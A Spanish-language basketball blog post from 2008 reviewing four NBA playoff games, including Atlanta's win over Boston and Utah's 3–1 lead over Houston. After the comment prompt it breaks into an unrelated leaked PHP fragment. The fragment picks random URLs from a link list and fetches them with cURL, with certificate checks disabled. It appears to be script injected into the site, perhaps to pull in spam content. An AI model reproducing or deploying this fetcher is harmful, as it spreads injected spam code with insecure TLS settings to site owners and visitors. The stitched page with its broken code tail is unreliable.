No trío no cry

28 de April de 2008 por TheDeerHunter

by TheDeerHunter & Aro_Pasado

No trío no cry (BOS 93 – ATL 102)

Es conocido por todos que las mayoría de cosas sustentadas en tres apoyos, gozan de gran solidez y estabilidad. En este partido le fallaron a Boston 2 de esos 3 apoyos que le han hecho pasar a ser favorito a todo. Eso, unido a un gran ambiente y unos atleticos Hawks hicieron besar la lona al equipo del trébol.

Se suponía un gran ambiente en la ciudad olímpica y se cumplió. El Philips Arena fue una olla a presión, con todo el publico coreando los ya habituales “defense, defense”, “Beat L. A.” y demás consignas de guerra. Se notaba que allí no se había vivido nada así desde el siglo pasado, justo antes de entrar en reconstrucción y no saber si ya se ha dado la reconstrucción por buena. Y la verdad es que se notaba que la gente va a querer estar en el próximo partido aunque bien es cierto, que no será sábado y eso quizá estimule un poco el absentismo en la gradas.

Yendo al grano. Quizás nos encontráramos con una primera parte de tanteo, dando como resultado un empate a 56 punticos. El comienzo de la segunda parte resultó igualado, pero a base de entusiamo y defensa Atlanta consiguió pegar un hachazo a eso del quinto minuto que resultó finalmente determinante de maner que el último cuarto sólo sirvió para mantener una distancia cómoda de unos diez puntos. Destacar en ese instante a Smith encadenando 2 triples y un mate marca de la casa y objetivo de los seres superiores que suelen elegir las 10 mejores de la jornada.

Reseñar, el regular partido de los componentes del trio que no se apodan “the big ticket”. Los 5-13 y 5-14 de Pierce y Allen fueron claves en la debacle bostoniana. Por la parte de los del refresco de cola, excelentes Joe Johnson, Josh Smith y Al Horford. No desentonaron ni Bibby ni Williams ni su suplente, Childress.

Veremos (si el sueño nos lo permite)

Mientras hay vida hay esperanza (ORL 106 – TOR 94)

Toronto peleó hasta el final con mucha dignidad, pero Orlando supo imponerse en los momentos decisivos jugando con mucha frialdad e inteligencia.

Chris Bosh quiso reivindicarse a si mismo haciendo un partido soberbio (37 ptos y 13 rebotes) pero en esta ocasión no obtuvo la ayuda habitual del resto del equipo. Todos estuvieron bastante fallones, sobre todo más allá de la línea de 3. Al no lograr abrir el campo los jugadores de Toronto tenían que ir continuamente a morir a la zona, precísamente donde Orlando es más poderoso. Supermán Howard no tuvo piedad de ellos y se infló a taponar tiros (rozó el triple doble a taponazo limpio)

Cuando un equipo como Toronto únicamente logra alcanzar 20 puntos por cuarto durante la segunda mitad lo tiene muy difícil para conseguir la victoria. Más aún cuando en el rival cuenta con excelentes anotadores como Rashard Lewis, que anoche decidió despertar de su letargo y castigó constantemente la floja defensa de Raptors con su versátil juego interior-exterior. En esta ocasión Turkoglu no estuvo tan fino como es habitual en él y sufrió mucho tratando de defender a Bosh, sin embargo sí supo tomar las decisiones correctas en los momentos clave y volvió a ser decisivo para lograr la victoria.

Calderón no tuvo su noche. Estuvo negado en el tiro que era lo que el equipo más necesitaba y estuvo mal defensivamente. Por contra, en esta ocasión TJ Ford estuvo bastante mejor en la defensa y la distribución del balón, aunque tampoco es que estuviera especialmente acertado de cara a canasta. Bargnani en sus números, completamente desaparecido en combate demostrando que esta eliminatoria le viene grande.

A pesar de todo Toronto demostró una garra y una entrega incuestionables que le permitió disputar el partido hasta casi el último minuto pero Orlando no se dejó presionar y tuvo más acierto, logrando la victoria. A pesar del resultado, Calderón y los suyos no tienen todo perdido. Han demostrado que pueden batir a los de Florida y a punto estuvieron de conseguirlo en su casa en el segundo partido. Si logran sorprender en el 5º todavía tendrán algo que decir en esta eliminatoria.

Por cierto, espectacular el ambiente en Toronto. Ójala puedan disfrutar de otro partido más… al menos.

Aburrimiento en el Pepsi Center (LAL 102 – DEN 84)

Los Lakers dejaron vista para sentencia su eliminatoria contra Denver en un partido sin historia. Serios, sin alardes, dejaron que los Nuggets se ahogaran en sus propios errores. Con Melo y Iverson tirándose hasta las zapatillas con un nivel de acierto que rozaba el ridículo, el último cuarto parecía un velatorio en el pabellón.
La defensa de Denver, inexistente. Sin forzar la máquina un buen número de jugadores amarillos alcanzaron las dobles figuras. Ni siquiera hicieron falta ni el mejor Bryant (estuvo bastante lamentable en la línea de tres) ni el mejor Gasol (que defendió como a él le gusta, rascándose la barriga), ni el mejor Odom. Ni siquiera el mejor Radmanovic (una vez más el peor del equipo, y van ya…)

Lakers lo tiene hecho y los Nuggets parecen haber tirado la toalla prematuramente. Aunque nunca hay que fiarse…

La venganza turca (HOU 82-UTH 86)

Dicen que es una de las peores, nunca he tenido la oportunidad enervar a ningún subdito turco hasta el punto de ser objeto de su venganza, por lo tanto nada más que puedo decirlo de oídas. Ayer sucedió una de esas jugadas, que marcan series. Mehmet “Memo” Okur (a partir de ahora “el turco vengador”) consiguió un rebote a 7.3 segundos del fín tras haber fallado Deron Williams dos tiros libres. Posteriormente fue objeto de falta, y selló con su acierto completo desde la línea un 3-1 que mete las esperanzas tejanas en un mar de aguas más que procelosas, dando como bueno el resultado final de 86-82.

A ciencia cierta, el partido había transcurrido por donde había querido el equipo de la ciudad del lago salado. El primer cuarto estuvo igualado. Distancia de 8 puntos al descanso y 16 puntos una vez se había consumido 5 minutos del tercer cuarto. No son los Rockets precisamente un equipo de mentalidad frágil, como demuestran sus 22 victorias consecutivas de liga regular, por lo que consiguieron sobreponerse y a falta de 10:39 situarse a un solo punto. Pero parece que les agrada dejar los retos inconclusos. A partir de ese punto se distanció Utah, y no volvieron a tener opciones hasta ser ejecutados por “el turco vengador”, tras sendos triples onsecutivos de Alston y Battier.

La serie se ha puesto en plan “milagritos redux” para Houston. Levantar un 3-1 se ha hecho alguna vez, pero no es nada trivial. Si miramos a los porcentajes de Alston, McGrady y Jackson, todos los seres cabales apostaríamos por el 4-1 o la sumo 4-2, pero apostar por la remontada sería pasarse al plano de la utopía, pero ¿alguien no se ha pasado a tal plano ninguna vez?

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>